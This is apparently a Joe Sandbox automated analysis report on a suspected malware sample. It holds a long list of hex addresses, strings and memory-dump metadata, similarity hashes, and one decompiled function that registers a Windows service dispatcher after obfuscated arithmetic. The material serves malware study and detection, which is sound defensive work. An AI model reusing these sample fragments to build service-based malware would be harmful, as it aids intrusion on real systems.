0x00000000
0x00000000
0x003c0144
0x003c011f
0x003c011f
0x003c0125
0x00000000
0x00000000
0x00000000
0x003c0125
0x003c008c
0x003c008e
0x003c00a3
0x003c00ab
0x003c00ad
0x003c00c2
0x003c00ca
0x003c00cc
0x003c00e1
0x003c00e9
0x003c00eb
0x003c00f4
0x003c00f4
0x003c00f4
0x00000000
0x003c00eb
0x003c00d5
0x003c00d5
0x003c00db
0x00000000
0x00000000
0x00000000
0x003c00db
0x003c00b6
0x003c00b6
0x003c00bc
0x00000000
0x00000000
0x00000000
0x003c00bc
0x003c0097
0x003c0097
0x003c009d
0x00000000
0x00000000
0x00000000
0x003c009d
0x003c04c1
0x003c086b
0x003c086b
0x00000000
0x003c086b
0x003c04c7
0x00000000
0x00000000
0x00000000
0x003c0c25
0x003c0c25
0x003c0c29
0x003c0c2d
0x003c0c2f
0x003c0c35
0x003c0c3c
0x003c0c3c
0x003c0c3c
0x00000000
0x00000000
0x003c0ff7
0x003c0fff
0x00000000
0x00000000
0x00000000
0x00000000
0x003c13e0
0x003c13e0
0x003c13e4
0x003c13e8
0x003c13ea
0x003c1005
0x003c1005
0x003c1009
0x003c100d
0x003c100f
0x00000000
0x00000000
0x003c1015
0x003c1019
0x003c101c
0x003c1022
0x003c1403
0x003c1403
0x00000000
0x003c1403
0x00000000
0x003c1028
0x003c13f0
0x003c13f4
0x003c13f7
0x003c13fd
0x00000000
0x00000000
0x00000000
0x00000000
0x003c07f0
0x003c07f0
0x003c07f6
0x003c0865
0x003c0867
0x003c0869
0x00000000
0x00000000
0x00000000
0x003c0869
0x003c07f8
0x003c07fb
0x003c07ff
0x003c0801
0x003c0812
0x003c0812
0x003c0816
0x003c081a
0x003c081c
0x003c082d
0x003c082d
0x003c0831
0x003c0835
0x003c0837
0x003c084c
0x003c084c
0x003c0854
0x003c0856
0x003c0858
0x003c085f
0x003c085f
0x003c085f
0x00000000
0x003c0856
0x003c0839
0x003c083d
0x003c0840
0x003c0846
0x00000000
0x00000000
0x003c0848
0x003c0848
0x00000000
0x003c0848
0x003c081e
0x003c0822
0x003c0825
0x003c082b
0x00000000
0x00000000
0x00000000
0x003c082b
0x003c0803
0x003c0807
0x003c080a
0x003c0810
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0b9e
0x003c0b9e
0x003c0ba4
0x003c0c1b
0x003c0c1d
0x003c0c1f
0x00000000
0x00000000
0x00000000
0x003c0c1f
0x003c0ba6
0x003c0ba9
0x003c0bad
0x003c0baf
0x003c0bc4
0x003c0bc4
0x003c0bc8
0x003c0bcc
0x003c0bce
0x003c0be3
0x003c0be3
0x003c0be7
0x003c0beb
0x003c0bed
0x003c0c02
0x003c0c02
0x003c0c06
0x003c0c0a
0x003c0c0c
0x003c0c0e
0x003c0c15
0x003c0c15
0x003c0c15
0x00000000
0x003c0c0c
0x003c0bef
0x003c0bf3
0x003c0bf6
0x003c0bf6
0x003c0bfc
0x00000000
0x00000000
0x00000000
0x003c0bfc
0x003c0bd0
0x003c0bd4
0x003c0bd7
0x003c0bd7
0x003c0bdd
0x00000000
0x00000000
0x00000000
0x003c0bdd
0x003c0bb1
0x003c0bb5
0x003c0bb8
0x003c0bb8
0x003c0bbe
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0f70
0x003c0f70
0x003c0f76
0x003c0fed
0x003c0fef
0x003c0ff1
0x00000000
0x00000000
0x00000000
0x003c0ff1
0x003c0f78
0x003c0f7b
0x003c0f7f
0x003c0f81
0x003c0f96
0x003c0f96
0x003c0f9a
0x003c0f9e
0x003c0fa0
0x003c0fb5
0x003c0fb5
0x003c0fb9
0x003c0fbd
0x003c0fbf
0x003c0fd4
0x003c0fd4
0x003c0fd8
0x003c0fdc
0x003c0fde
0x003c0fe0
0x003c0fe7
0x003c0fe7
0x003c0fe7
0x00000000
0x003c0fde
0x003c0fc1
0x003c0fc5
0x003c0fc8
0x003c0fc8
0x003c0fce
0x00000000
0x00000000
0x00000000
0x003c0fce
0x003c0fa2
0x003c0fa6
0x003c0fa9
0x003c0fa9
0x003c0faf
0x00000000
0x00000000
0x00000000
0x003c0faf
0x003c0f83
0x003c0f87
0x003c0f8a
0x003c0f8a
0x003c0f90
0x00000000
0x00000000
0x00000000
0x00000000
0x003c1359
0x003c1359
0x003c135f
0x003c13d6
0x003c13d8
0x003c13da
0x00000000
0x00000000
0x00000000
0x003c13da
0x003c1361
0x003c1364
0x003c1368
0x003c136a
0x003c137f
0x003c137f
0x003c1383
0x003c1387
0x003c1389
0x003c139e
0x003c139e
0x003c13a2
0x003c13a6
0x003c13a8
0x003c13bd
0x003c13bd
0x003c13c1
0x003c13c5
0x003c13c7
0x003c13c9
0x003c13d0
0x003c13d0
0x003c13d0
0x00000000
0x003c13c7
0x003c13aa
0x003c13ae
0x003c13b1
0x003c13b1
0x003c13b7
0x00000000
0x00000000
0x00000000
0x003c13b7
0x003c138b
0x003c138f
0x003c1392
0x003c1392
0x003c1398
0x00000000
0x00000000
0x00000000
0x003c1398
0x003c136c
0x003c1370
0x003c1373
0x003c1373
0x003c1379
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0769
0x003c0769
0x003c076f
0x003c07e6
0x003c07e8
0x003c07ea
0x00000000
0x00000000
0x00000000
0x003c07ea
0x003c0771
0x003c0774
0x003c0778
0x003c077a
0x003c078f
0x003c078f
0x003c0793
0x003c0797
0x003c0799
0x003c07ae
0x003c07ae
0x003c07b2
0x003c07b6
0x003c07b8
0x003c07cd
0x003c07cd
0x003c07d1
0x003c07d5
0x003c07d7
0x003c07d9
0x003c07e0
0x003c07e0
0x003c07e0
0x00000000
0x003c07d7
0x003c07ba
0x003c07be
0x003c07c1
0x003c07c1
0x003c07c7
0x00000000
0x00000000
0x00000000
0x003c07c7
0x003c079b
0x003c079f
0x003c07a2
0x003c07a2
0x003c07a8
0x00000000
0x00000000
0x00000000
0x003c07a8
0x003c077c
0x003c0780
0x003c0783
0x003c0783
0x003c0789
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0b16
0x003c0b16
0x003c0b1c
0x003c0b94
0x003c0b96
0x003c0b98
0x00000000
0x00000000
0x00000000
0x003c0b98
0x003c0b1e
0x003c0b22
0x003c0b26
0x003c0b28
0x003c0b3d
0x003c0b3d
0x003c0b41
0x003c0b45
0x003c0b47
0x003c0b5c
0x003c0b5c
0x003c0b60
0x003c0b64
0x003c0b66
0x003c0b7b
0x003c0b7b
0x003c0b7f
0x003c0b83
0x003c0b85
0x003c0b87
0x003c0b8e
0x003c0b8e
0x003c0b8e
0x00000000
0x003c0b85
0x003c0b68
0x003c0b6c
0x003c0b6f
0x003c0b6f
0x003c0b75
0x00000000
0x00000000
0x00000000
0x003c0b75
0x003c0b49
0x003c0b4d
0x003c0b50
0x003c0b50
0x003c0b56
0x00000000
0x00000000
0x00000000
0x003c0b56
0x003c0b2a
0x003c0b2e
0x003c0b31
0x003c0b31
0x003c0b37
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0ee8
0x003c0ee8
0x003c0eee
0x003c0f66
0x003c0f68
0x003c0f6a
0x00000000
0x00000000
0x00000000
0x003c0f6a
0x003c0ef0
0x003c0ef4
0x003c0ef8
0x003c0efa
0x003c0f0f
0x003c0f0f
0x003c0f13
0x003c0f17
0x003c0f19
0x003c0f2e
0x003c0f2e
0x003c0f32
0x003c0f36
0x003c0f38
0x003c0f4d
0x003c0f4d
0x003c0f51
0x003c0f55
0x003c0f57
0x003c0f59
0x003c0f60
0x003c0f60
0x003c0f60
0x00000000
0x003c0f57
0x003c0f3a
0x003c0f3e
0x003c0f41
0x003c0f41
0x003c0f47
0x00000000
0x00000000
0x00000000
0x003c0f47
0x003c0f1b
0x003c0f1f
0x003c0f22
0x003c0f22
0x003c0f28
0x00000000
0x00000000
0x00000000
0x003c0f28
0x003c0efc
0x003c0f00
0x003c0f03
0x003c0f03
0x003c0f09
0x00000000
0x00000000
0x00000000
0x00000000
0x003c12d2
0x003c12d2
0x003c12d8
0x003c134f
0x003c1351
0x003c1353
0x00000000
0x00000000
0x00000000
0x003c1353
0x003c12da
0x003c12dd
0x003c12e1
0x003c12e3
0x003c12f8
0x003c12f8
0x003c12fc
0x003c1300
0x003c1302
0x003c1317
0x003c1317
0x003c131b
0x003c131f
0x003c1321
0x003c1336
0x003c1336
0x003c133a
0x003c133e
0x003c1340
0x003c1342
0x003c1349
0x003c1349
0x003c1349
0x00000000
0x003c1340
0x003c1323
0x003c1327
0x003c132a
0x003c132a
0x003c1330
0x00000000
0x00000000
0x00000000
0x003c1330
0x003c1304
0x003c1308
0x003c130b
0x003c130b
0x003c1311
0x00000000
0x00000000
0x00000000
0x003c1311
0x003c12e5
0x003c12e9
0x003c12ec
0x003c12ec
0x003c12f2
0x00000000
0x00000000
0x00000000
0x00000000
0x003c06e1
0x003c06e1
0x003c06e7
0x003c075f
0x003c0761
0x003c0763
0x00000000
0x00000000
0x00000000
0x003c0763
0x003c06e9
0x003c06ed
0x003c06f1
0x003c06f3
0x003c0708
0x003c0708
0x003c070c
0x003c0710
0x003c0712
0x003c0727
0x003c0727
0x003c072b
0x003c072f
0x003c0731
0x003c0746
0x003c0746
0x003c074a
0x003c074e
0x003c0750
0x003c0752
0x003c0759
0x003c0759
0x003c0759
0x00000000
0x003c0750
0x003c0733
0x003c0737
0x003c073a
0x003c073a
0x003c0740
0x00000000
0x00000000
0x00000000
0x003c0740
0x003c0714
0x003c0718
0x003c071b
0x003c071b
0x003c0721
0x00000000
0x00000000
0x00000000
0x003c0721
0x003c06f5
0x003c06f9
0x003c06fc
0x003c06fc
0x003c0702
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0a8f
0x003c0a8f
0x003c0a95
0x003c0b0c
0x003c0b0e
0x003c0b10
0x00000000
0x00000000
0x00000000
0x003c0b10
0x003c0a97
0x003c0a9a
0x003c0a9e
0x003c0aa0
0x003c0ab5
0x003c0ab5
0x003c0ab9
0x003c0abd
0x003c0abf
0x003c0ad4
0x003c0ad4
0x003c0ad8
0x003c0adc
0x003c0ade
0x003c0af3
0x003c0af3
0x003c0af7
0x003c0afb
0x003c0afd
0x003c0aff
0x003c0b06
0x003c0b06
0x003c0b06
0x00000000
0x003c0afd
0x003c0ae0
0x003c0ae4
0x003c0ae7
0x003c0ae7
0x003c0aed
0x00000000
0x00000000
0x00000000
0x003c0aed
0x003c0ac1
0x003c0ac5
0x003c0ac8
0x003c0ac8
0x003c0ace
0x00000000
0x00000000
0x00000000
0x003c0ace
0x003c0aa2
0x003c0aa6
0x003c0aa9
0x003c0aa9
0x003c0aaf
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0e61
0x003c0e61
0x003c0e67
0x003c0ede
0x003c0ee0
0x003c0ee2
0x00000000
0x00000000
0x00000000
0x003c0ee2
0x003c0e69
0x003c0e6c
0x003c0e70
0x003c0e72
0x003c0e87
0x003c0e87
0x003c0e8b
0x003c0e8f
0x003c0e91
0x003c0ea6
0x003c0ea6
0x003c0eaa
0x003c0eae
0x003c0eb0
0x003c0ec5
0x003c0ec5
0x003c0ec9
0x003c0ecd
0x003c0ecf
0x003c0ed1
0x003c0ed8
0x003c0ed8
0x003c0ed8
0x00000000
0x003c0ecf
0x003c0eb2
0x003c0eb6
0x003c0eb9
0x003c0eb9
0x003c0ebf
0x00000000
0x00000000
0x00000000
0x003c0ebf
0x003c0e93
0x003c0e97
0x003c0e9a
0x003c0e9a
0x003c0ea0
0x00000000
0x00000000
0x00000000
0x003c0ea0
0x003c0e74
0x003c0e78
0x003c0e7b
0x003c0e7b
0x003c0e81
0x00000000
0x00000000
0x00000000
0x00000000
0x003c124a
0x003c124a
0x003c1250
0x003c12c8
0x003c12ca
0x003c12cc
0x00000000
0x00000000
0x00000000
0x003c12cc
0x003c1252
0x003c1256
0x003c125a
0x003c125c
0x003c1271
0x003c1271
0x003c1275
0x003c1279
0x003c127b
0x003c1290
0x003c1290
0x003c1294
0x003c1298
0x003c129a
0x003c12af
0x003c12af
0x003c12b3
0x003c12b7
0x003c12b9
0x003c12bb
0x003c12c2
0x003c12c2
0x003c12c2
0x00000000
0x003c12b9
0x003c129c
0x003c12a0
0x003c12a3
0x003c12a3
0x003c12a9
0x00000000
0x00000000
0x00000000
0x003c12a9
0x003c127d
0x003c1281
0x003c1284
0x003c1284
0x003c128a
0x00000000
0x00000000
0x00000000
0x003c128a
0x003c125e
0x003c1262
0x003c1265
0x003c1265
0x003c126b
0x00000000
0x00000000
0x00000000
0x00000000
0x003c065a
0x003c065a
0x003c0660
0x003c06d7
0x003c06d9
0x003c06db
0x00000000
0x00000000
0x00000000
0x003c06db
0x003c0662
0x003c0665
0x003c0669
0x003c066b
0x003c0680
0x003c0680
0x003c0684
0x003c0688
0x003c068a
0x003c069f
0x003c069f
0x003c06a3
0x003c06a7
0x003c06a9
0x003c06be
0x003c06be
0x003c06c2
0x003c06c6
0x003c06c8
0x003c06ca
0x003c06d1
0x003c06d1
0x003c06d1
0x00000000
0x003c06c8
0x003c06ab
0x003c06af
0x003c06b2
0x003c06b2
0x003c06b8
0x00000000
0x00000000
0x00000000
0x003c06b8
0x003c068c
0x003c0690
0x003c0693
0x003c0693
0x003c0699
0x00000000
0x00000000
0x00000000
0x003c0699
0x003c066d
0x003c0671
0x003c0674
0x003c0674
0x003c067a
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0a08
0x003c0a08
0x003c0a0e
0x003c0a85
0x003c0a87
0x003c0a89
0x00000000
0x00000000
0x00000000
0x003c0a89
0x003c0a10
0x003c0a13
0x003c0a17
0x003c0a19
0x003c0a2e
0x003c0a2e
0x003c0a32
0x003c0a36
0x003c0a38
0x003c0a4d
0x003c0a4d
0x003c0a51
0x003c0a55
0x003c0a57
0x003c0a6c
0x003c0a6c
0x003c0a70
0x003c0a74
0x003c0a76
0x003c0a78
0x003c0a7f
0x003c0a7f
0x003c0a7f
0x00000000
0x003c0a76
0x003c0a59
0x003c0a5d
0x003c0a60
0x003c0a60
0x003c0a66
0x00000000
0x00000000
0x00000000
0x003c0a66
0x003c0a3a
0x003c0a3e
0x003c0a41
0x003c0a41
0x003c0a47
0x00000000
0x00000000
0x00000000
0x003c0a47
0x003c0a1b
0x003c0a1f
0x003c0a22
0x003c0a22
0x003c0a28
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0dda
0x003c0dda
0x003c0de0
0x003c0e57
0x003c0e59
0x003c0e5b
0x00000000
0x00000000
0x00000000
0x003c0e5b
0x003c0de2
0x003c0de5
0x003c0de9
0x003c0deb
0x003c0e00
0x003c0e00
0x003c0e04
0x003c0e08
0x003c0e0a
0x003c0e1f
0x003c0e1f
0x003c0e23
0x003c0e27
0x003c0e29
0x003c0e3e
0x003c0e3e
0x003c0e42
0x003c0e46
0x003c0e48
0x003c0e4a
0x003c0e51
0x003c0e51
0x003c0e51
0x00000000
0x003c0e48
0x003c0e2b
0x003c0e2f
0x003c0e32
0x003c0e32
0x003c0e38
0x00000000
0x00000000
0x00000000
0x003c0e38
0x003c0e0c
0x003c0e10
0x003c0e13
0x003c0e13
0x003c0e19
0x00000000
0x00000000
0x00000000
0x003c0e19
0x003c0ded
0x003c0df1
0x003c0df4
0x003c0df4
0x003c0dfa
0x00000000
0x00000000
0x00000000
0x00000000
0x003c11c3
0x003c11c3
0x003c11c9
0x003c1240
0x003c1242
0x003c1244
0x00000000
0x00000000
0x00000000
0x003c1244
0x003c11cb
0x003c11ce
0x003c11d2
0x003c11d4
0x003c11e9
0x003c11e9
0x003c11ed
0x003c11f1
0x003c11f3
0x003c1208
0x003c1208
0x003c120c
0x003c1210
0x003c1212
0x003c1227
0x003c1227
0x003c122b
0x003c122f
0x003c1231
0x003c1233
0x003c123a
0x003c123a
0x003c123a
0x00000000
0x003c1231
0x003c1214
0x003c1218
0x003c121b
0x003c121b
0x003c1221
0x00000000
0x00000000
0x00000000
0x003c1221
0x003c11f5
0x003c11f9
0x003c11fc
0x003c11fc
0x003c1202
0x00000000
0x00000000
0x00000000
0x003c1202
0x003c11d6
0x003c11da
0x003c11dd
0x003c11dd
0x003c11e3
0x00000000
0x00000000
0x00000000
0x00000000
0x003c05d3
0x003c05d3
0x003c05d9
0x003c0650
0x003c0652
0x003c0654
0x00000000
0x00000000
0x00000000
0x003c0654
0x003c05db
0x003c05de
0x003c05e2
0x003c05e4
0x003c05f9
0x003c05f9
0x003c05fd
0x003c0601
0x003c0603
0x003c0618
0x003c0618
0x003c061c
0x003c0620
0x003c0622
0x003c0637
0x003c0637
0x003c063b
0x003c063f
0x003c0641
0x003c0643
0x003c064a
0x003c064a
0x003c064a
0x00000000
0x003c0641
0x003c0624
0x003c0628
0x003c062b
0x003c062b
0x003c0631
0x00000000
0x00000000
0x00000000
0x003c0631
0x003c0605
0x003c0609
0x003c060c
0x003c060c
0x003c0612
0x00000000
0x00000000
0x00000000
0x003c0612
0x003c05e6
0x003c05ea
0x003c05ed
0x003c05ed
0x003c05f3
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0981
0x003c0981
0x003c0987
0x003c09fe
0x003c0a00
0x003c0a02
0x00000000
0x00000000
0x00000000
0x003c0a02
0x003c0989
0x003c098c
0x003c0990
0x003c0992
0x003c09a7
0x003c09a7
0x003c09ab
0x003c09af
0x003c09b1
0x003c09c6
0x003c09c6
0x003c09ca
0x003c09ce
0x003c09d0
0x003c09e5
0x003c09e5
0x003c09e9
0x003c09ed
0x003c09ef
0x003c09f1
0x003c09f8
0x003c09f8
0x003c09f8
0x00000000
0x003c09ef
0x003c09d2
0x003c09d6
0x003c09d9
0x003c09d9
0x003c09df
0x00000000
0x00000000
0x00000000
0x003c09df
0x003c09b3
0x003c09b7
0x003c09ba
0x003c09ba
0x003c09c0
0x00000000
0x00000000
0x00000000
0x003c09c0
0x003c0994
0x003c0998
0x003c099b
0x003c099b
0x003c09a1
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0d53
0x003c0d53
0x003c0d59
0x003c0dd0
0x003c0dd2
0x003c0dd4
0x00000000
0x00000000
0x00000000
0x003c0dd4
0x003c0d5b
0x003c0d5e
0x003c0d62
0x003c0d64
0x003c0d79
0x003c0d79
0x003c0d7d
0x003c0d81
0x003c0d83
0x003c0d98
0x003c0d98
0x003c0d9c
0x003c0da0
0x003c0da2
0x003c0db7
0x003c0db7
0x003c0dbb
0x003c0dbf
0x003c0dc1
0x003c0dc3
0x003c0dca
0x003c0dca
0x003c0dca
0x00000000
0x003c0dc1
0x003c0da4
0x003c0da8
0x003c0dab
0x003c0dab
0x003c0db1
0x00000000
0x00000000
0x00000000
0x003c0db1
0x003c0d85
0x003c0d89
0x003c0d8c
0x003c0d8c
0x003c0d92
0x00000000
0x00000000
0x00000000
0x003c0d92
0x003c0d66
0x003c0d6a
0x003c0d6d
0x003c0d6d
0x003c0d73
0x00000000
0x00000000
0x00000000
0x00000000
0x003c113c
0x003c113c
0x003c1142
0x003c11b9
0x003c11bb
0x003c11bd
0x00000000
0x00000000
0x00000000
0x003c11bd
0x003c1144
0x003c1147
0x003c114b
0x003c114d
0x003c1162
0x003c1162
0x003c1166
0x003c116a
0x003c116c
0x003c1181
0x003c1181
0x003c1185
0x003c1189
0x003c118b
0x003c11a0
0x003c11a0
0x003c11a4
0x003c11a8
0x003c11aa
0x003c11ac
0x003c11b3
0x003c11b3
0x003c11b3
0x00000000
0x003c11aa
0x003c118d
0x003c1191
0x003c1194
0x003c1194
0x003c119a
0x00000000
0x00000000
0x00000000
0x003c119a
0x003c116e
0x003c1172
0x003c1175
0x003c1175
0x003c117b
0x00000000
0x00000000
0x00000000
0x003c117b
0x003c114f
0x003c1153
0x003c1156
0x003c1156
0x003c115c
0x00000000
0x00000000
0x00000000
0x00000000
0x003c054c
0x003c054c
0x003c0552
0x003c05c9
0x003c05cb
0x003c05cd
0x00000000
0x00000000
0x00000000
0x003c05cd
0x003c0554
0x003c0557
0x003c055b
0x003c055d
0x003c0572
0x003c0572
0x003c0576
0x003c057a
0x003c057c
0x003c0591
0x003c0591
0x003c0595
0x003c0599
0x003c059b
0x003c05b0
0x003c05b0
0x003c05b4
0x003c05b8
0x003c05ba
0x003c05bc
0x003c05c3
0x003c05c3
0x003c05c3
0x00000000
0x003c05ba
0x003c059d
0x003c05a1
0x003c05a4
0x003c05a4
0x003c05aa
0x00000000
0x00000000
0x00000000
0x003c05aa
0x003c057e
0x003c0582
0x003c0585
0x003c0585
0x003c058b
0x00000000
0x00000000
0x00000000
0x003c058b
0x003c055f
0x003c0563
0x003c0566
0x003c0566
0x003c056c
0x00000000
0x00000000
0x00000000
0x00000000
0x003c08fa
0x003c08fa
0x003c0900
0x003c0977
0x003c0979
0x003c097b
0x00000000
0x00000000
0x00000000
0x003c097b
0x003c0902
0x003c0905
0x003c0909
0x003c090b
0x003c0920
0x003c0920
0x003c0924
0x003c0928
0x003c092a
0x003c093f
0x003c093f
0x003c0943
0x003c0947
0x003c0949
0x003c095e
0x003c095e
0x003c0962
0x003c0966
0x003c0968
0x003c096a
0x003c0971
0x003c0971
0x003c0971
0x00000000
0x003c0968
0x003c094b
0x003c094f
0x003c0952
0x003c0952
0x003c0958
0x00000000
0x00000000
0x00000000
0x003c0958
0x003c092c
0x003c0930
0x003c0933
0x003c0933
0x003c0939
0x00000000
0x00000000
0x00000000
0x003c0939
0x003c090d
0x003c0911
0x003c0914
0x003c0914
0x003c091a
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0ccc
0x003c0ccc
0x003c0cd2
0x003c0d49
0x003c0d4b
0x003c0d4d
0x00000000
0x00000000
0x00000000
0x003c0d4d
0x003c0cd4
0x003c0cd7
0x003c0cdb
0x003c0cdd
0x003c0cf2
0x003c0cf2
0x003c0cf6
0x003c0cfa
0x003c0cfc
0x003c0d11
0x003c0d11
0x003c0d15
0x003c0d19
0x003c0d1b
0x003c0d30
0x003c0d30
0x003c0d34
0x003c0d38
0x003c0d3a
0x003c0d3c
0x003c0d43
0x003c0d43
0x003c0d43
0x00000000
0x003c0d3a
0x003c0d1d
0x003c0d21
0x003c0d24
0x003c0d24
0x003c0d2a
0x00000000
0x00000000
0x00000000
0x003c0d2a
0x003c0cfe
0x003c0d02
0x003c0d05
0x003c0d05
0x003c0d0b
0x00000000
0x00000000
0x00000000
0x003c0d0b
0x003c0cdf
0x003c0ce3
0x003c0ce6
0x003c0ce6
0x003c0cec
0x00000000
0x00000000
0x00000000
0x00000000
0x003c10b5
0x003c10b5
0x003c10bb
0x003c1132
0x003c1134
0x003c1136
0x00000000
0x00000000
0x00000000
0x003c1136
0x003c10bd
0x003c10c0
0x003c10c4
0x003c10c6
0x003c10db
0x003c10db
0x003c10df
0x003c10e3
0x003c10e5
0x003c10fa
0x003c10fa
0x003c10fe
0x003c1102
0x003c1104
0x003c1119
0x003c1119
0x003c111d
0x003c1121
0x003c1123
0x003c1125
0x003c112c
0x003c112c
0x003c112c
0x00000000
0x003c1123
0x003c1106
0x003c110a
0x003c110d
0x003c110d
0x003c1113
0x00000000
0x00000000
0x00000000
0x003c1113
0x003c10e7
0x003c10eb
0x003c10ee
0x003c10ee
0x003c10f4
0x00000000
0x00000000
0x00000000
0x003c10f4
0x003c10c8
0x003c10cc
0x003c10cf
0x003c10cf
0x003c10d5
0x00000000
0x00000000
0x00000000
0x00000000
0x003c04d5
0x003c04db
0x003c0546
0x003c0548
0x003c054a
0x00000000
0x00000000
0x00000000
0x003c054a
0x003c04dd
0x003c04e0
0x003c04e4
0x003c04e6
0x003c04f7
0x003c04f7
0x003c04fb
0x003c04ff
0x003c0501
0x003c0512
0x003c0512
0x003c0516
0x003c051a
0x003c051c
0x003c052d
0x003c052d
0x003c0531
0x003c0535
0x003c0537
0x003c0539
0x003c0540
0x003c0540
0x003c0540
0x00000000
0x003c0537
0x003c051e
0x003c0522
0x003c0525
0x003c0525
0x003c052b
0x00000000
0x00000000
0x00000000
0x003c052b
0x003c0503
0x003c0507
0x003c050a
0x003c050a
0x003c0510
0x00000000
0x00000000
0x00000000
0x003c0510
0x003c04e8
0x003c04ec
0x003c04ef
0x003c04ef
0x003c04f5
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0873
0x003c0879
0x003c08f0
0x003c08f2
0x003c08f4
0x00000000
0x00000000
0x00000000
0x003c08f4
0x003c087b
0x003c087e
0x003c0882
0x003c0884
0x003c0899
0x003c0899
0x003c089d
0x003c08a1
0x003c08a3
0x003c08b8
0x003c08b8
0x003c08bc
0x003c08c0
0x003c08c2
0x003c08d7
0x003c08d7
0x003c08db
0x003c08df
0x003c08e1
0x003c08e3
0x003c08ea
0x003c08ea
0x003c08ea
0x00000000
0x003c08e1
0x003c08c4
0x003c08c8
0x003c08cb
0x003c08cb
0x003c08d1
0x00000000
0x00000000
0x00000000
0x003c08d1
0x003c08a5
0x003c08a9
0x003c08ac
0x003c08ac
0x003c08b2
0x00000000
0x00000000
0x00000000
0x003c08b2
0x003c0886
0x003c088a
0x003c088d
0x003c088d
0x003c0893
0x00000000
0x00000000
0x00000000
0x00000000
0x003c0c45
0x003c0c4b
0x003c0cc2
0x003c0cc4
0x003c0cc6
0x00000000
0x00000000
0x00000000
0x003c0cc6
0x003c0c4d
0x003c0c50
0x003c0c54
0x003c0c56
0x003c0c6b
0x003c0c6b
0x003c0c6f
0x003c0c73
0x003c0c75
0x003c0c8a
0x003c0c8a
0x003c0c8e
0x003c0c92
0x003c0c94
0x003c0ca9
0x003c0ca9
0x003c0cad
0x003c0cb1
0x003c0cb3
0x003c0cb5
0x003c0cbc
0x003c0cbc
0x003c0cbc
0x00000000
0x003c0cb3
0x003c0c96
0x003c0c9a
0x003c0c9d
0x003c0c9d
0x003c0ca3
0x00000000
0x00000000
0x00000000
0x003c0ca3
0x003c0c77
0x003c0c7b
0x003c0c7e
0x003c0c7e
0x003c0c84
0x00000000
0x00000000
0x00000000
0x003c0c84
0x003c0c58
0x003c0c5c
0x003c0c5f
0x003c0c5f
0x003c0c65
0x00000000
0x00000000
0x00000000
0x00000000
0x003c102d
0x003c1033
0x003c10ab
0x003c10ad
0x003c10af
0x00000000
0x00000000
0x00000000
0x003c10af
0x003c1035
0x003c1039
0x003c103d
0x003c103f
0x003c1054
0x003c1054
0x003c1058
0x003c105c
0x003c105e
0x003c1073
0x003c1073
0x003c1077
0x003c107b
0x003c107d
0x003c1092
0x003c1092
0x003c1096
0x003c109a
0x003c109c
0x003c109e
0x003c10a5
0x003c10a5
0x003c10a5
0x00000000
0x003c109c
0x003c107f
0x003c1083
0x003c1086
0x003c1086
0x003c108c
0x00000000
0x00000000
0x00000000
0x003c108c
0x003c1060
0x003c1064
0x003c1067
0x003c1067
0x003c106d
0x00000000
0x00000000
0x00000000
0x003c106d
0x003c1041
0x003c1045
0x003c1048
0x003c1048
0x003c104e
0x00000000
0x00000000
0x00000000
0x00000000
0x003c04c7

Strings

]i;, xrefs: 003C14FE, 003C14D2, 003C148E, 003C140D, 003C0071

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID: ]i;
API String ID: 0-2651938107
Opcode ID: 45f181a34760962d3c9efdc12509dde2d9edf65b08f921790bdee863a124b90e
Instruction ID: 55a7ba64907129bbbc0f239f40ddae66385ccd121d4c047d62d47963ea4d34a8
Opcode Fuzzy Hash: 45f181a34760962d3c9efdc12509dde2d9edf65b08f921790bdee863a124b90e
Instruction Fuzzy Hash: 6802B333D496F28B8B7B4EBA04D0B277AA05E0175031F4A9DDEC4BF596C212DD069BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0038CDB0 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0038CDB0() {
				long long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _SERVICE_TABLE_ENTRY _v28;
				struct _SERVICE_TABLE_ENTRY _t9;

				 *0x3ce538 =  *0x3ce538 -  *0x3c75c8;
				_v12 =  *0x3ce338 +  *0x3c79f0;
				asm("fsubr qword [ebp-0x8]");
				_v12 =  *0x3ce538;
				_t9 =  *0x3d04ac; // 0x2d81140
				_v28 = _t9;
				_v24 = E0038D610;
				 *0x3ce590 =  *0x3ce590 + _v12;
				_v20 = 0;
				_v16 = 0;
				return StartServiceCtrlDispatcherA( &_v28);
			}

0x0038cdc6
0x0038cdd8
0x0038cde1
0x0038cde4
0x0038cded
0x0038cdf5
0x0038cdfa
0x0038ce01
0x0038ce07
0x0038ce0a
0x0038ce16

APIs

StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0038CE0D

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

